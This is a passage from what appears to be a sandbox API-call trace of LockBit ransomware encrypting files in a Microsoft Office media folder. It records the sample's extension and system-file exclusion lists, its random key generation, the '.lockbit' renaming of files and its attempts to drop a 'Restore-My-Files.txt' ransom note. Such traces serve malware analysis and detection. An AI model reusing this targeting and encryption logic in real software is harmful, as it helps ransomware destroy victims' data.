lpOverlapped=0x3df0008) returned 0x0 [0196.822] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199727.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199727.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.822] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.822] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.822] free (_Block=0x1fa2ed8) [0196.822] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199727.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.822] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.822] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.822] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc6b8000, ftCreationTime.dwHighDateTime=0x1be3e9a, ftLastAccessTime.dwLowDateTime=0xbd4c6ce0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbc6b8000, ftLastWriteTime.dwHighDateTime=0x1be3e9a, nFileSizeHigh=0x0, nFileSizeLow=0xaf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199755.WMF", cAlternateFileName="")) returned 1 [0196.822] lstrcmpiW (lpString1=".", lpString2="J0199755.WMF") returned -1 [0196.822] lstrcmpiW (lpString1="..", lpString2="J0199755.WMF") returned -1 [0196.822] PathFindExtensionW (pszPath="J0199755.WMF") returned=".WMF" [0196.822] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.822] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.822] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.822] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.822] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.822] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.822] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.822] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.822] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.822] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.822] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.822] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.823] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.823] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199755.WMF") returned 1 [0196.824] lstrcmpiW (lpString1="ntldr", lpString2="J0199755.WMF") returned 1 [0196.824] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199755.WMF") returned 1 [0196.824] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199755.WMF") returned -1 [0196.824] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199755.WMF") returned -1 [0196.824] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199755.WMF") returned 1 [0196.824] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199755.WMF") returned -1 [0196.824] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.824] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199755.WMF") returned=".WMF" [0196.824] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.824] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.824] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.825] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.825] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.825] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.825] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.825] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.825] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.825] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.825] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.825] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.825] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199755.WMF.lockbit") returned 70 [0196.825] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199755.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0199755.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0196.826] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.826] malloc (_Size=0x40068) returned 0x3df0008 [0196.826] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2800) returned 1 [0196.826] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.827] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.827] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.827] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.827] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.831] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199755.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199755.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.831] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.831] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.831] free (_Block=0x1fa2ed8) [0196.831] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199755.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.831] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.831] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.832] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd311d700, ftCreationTime.dwHighDateTime=0x1be3e9a, ftLastAccessTime.dwLowDateTime=0xbd4ece40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xd311d700, ftLastWriteTime.dwHighDateTime=0x1be3e9a, nFileSizeHigh=0x0, nFileSizeLow=0x948, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0199805.WMF", cAlternateFileName="")) returned 1 [0196.832] lstrcmpiW (lpString1=".", lpString2="J0199805.WMF") returned -1 [0196.833] lstrcmpiW (lpString1="..", lpString2="J0199805.WMF") returned -1 [0196.833] PathFindExtensionW (pszPath="J0199805.WMF") returned=".WMF" [0196.833] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.833] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.834] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.834] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0199805.WMF") returned 1 [0196.834] lstrcmpiW (lpString1="ntldr", lpString2="J0199805.WMF") returned 1 [0196.834] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0199805.WMF") returned 1 [0196.834] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0199805.WMF") returned -1 [0196.834] lstrcmpiW (lpString1="autorun.inf", lpString2="J0199805.WMF") returned -1 [0196.834] lstrcmpiW (lpString1="thumbs.db", lpString2="J0199805.WMF") returned 1 [0196.834] lstrcmpiW (lpString1="iconcache.db", lpString2="J0199805.WMF") returned -1 [0196.834] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.835] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199805.WMF") returned=".WMF" [0196.835] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.835] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.835] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.835] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199805.WMF.lockbit") returned 70 [0196.835] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199805.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0199805.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0196.837] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.837] malloc (_Size=0x40068) returned 0x3df0008 [0196.837] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2376) returned 1 [0196.837] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.838] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.838] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.838] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.838] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.838] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0196.843] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199805.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199805.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.843] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.843] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.843] free (_Block=0x1fa2ed8) [0196.843] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0199805.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.843] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.843] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.843] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85ccab00, ftCreationTime.dwHighDateTime=0x1be4d5e, ftLastAccessTime.dwLowDateTime=0xbd4ece40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x85ccab00, ftLastWriteTime.dwHighDateTime=0x1be4d5e, nFileSizeHigh=0x0, nFileSizeLow=0x2398, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0205462.WMF", cAlternateFileName="")) returned 1 [0196.844] lstrcmpiW (lpString1=".", lpString2="J0205462.WMF") returned -1 [0196.844] lstrcmpiW (lpString1="..", lpString2="J0205462.WMF") returned -1 [0196.844] PathFindExtensionW (pszPath="J0205462.WMF") returned=".WMF" [0196.844] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.844] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.844] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.845] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0205462.WMF") returned 1 [0196.845] lstrcmpiW (lpString1="ntldr", lpString2="J0205462.WMF") returned 1 [0196.845] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0205462.WMF") returned 1 [0196.845] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0205462.WMF") returned -1 [0196.845] lstrcmpiW (lpString1="autorun.inf", lpString2="J0205462.WMF") returned -1 [0196.845] lstrcmpiW (lpString1="thumbs.db", lpString2="J0205462.WMF") returned 1 [0196.845] lstrcmpiW (lpString1="iconcache.db", lpString2="J0205462.WMF") returned -1 [0196.845] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.845] 